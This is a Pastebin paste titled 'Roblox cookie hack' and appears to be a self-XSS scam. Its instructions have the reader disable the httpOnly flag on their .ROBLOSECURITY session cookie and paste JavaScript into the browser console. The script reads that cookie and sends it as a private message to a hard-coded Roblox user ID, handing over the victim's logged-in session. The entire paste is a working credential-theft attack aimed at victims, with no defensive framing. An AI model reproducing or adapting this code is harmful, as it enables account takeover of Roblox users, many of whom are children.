V3rmLua33

Roblox cookie hack

Feb 21st, 2015
457
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.96 KB | None | 0 0
  1. //Instructions:
  2. //Get Google Chrome and download the following plugin: https://chrome.google.com/webstore/detail/fngmhnnpilhplaeedifhccceomclgfbg
  3. //Click the cookie symbol and click the .ROBLOSECURITY cookie.
  4. //Uncheck the httpOnly checkbox and click Submit cookie changes.
  5. //Press F12 and click console. Paste the following code into the console and press enter.
  6.  
  7.  
  8. function getCookie(cname) {
  9.     var name = cname + "=";
  10.     var ca = document.cookie.split(';');
  11.     for(var i=0; i<ca.length; i++) {
  12.         var c = ca[i];
  13.         while (c.charAt(0)==' ') c = c.substring(1);
  14.         if (c.indexOf(name) != -1) return c.substring(name.length,c.length);
  15.     }
  16.     return "";
  17. };
  18. var co = getCookie('.ROBLOSECURITY');
  19. function PM(){
  20.         $.post("http://www.roblox.com/messages/send",{
  21.                 subject : "UMAD!",
  22.                 body : ""+co,
  23.                 recipientid : 14246909,
  24.                 cacheBuster : new Date().getTime()
  25.         })}
  26. PM()
Add Comment
Please, Sign In to add comment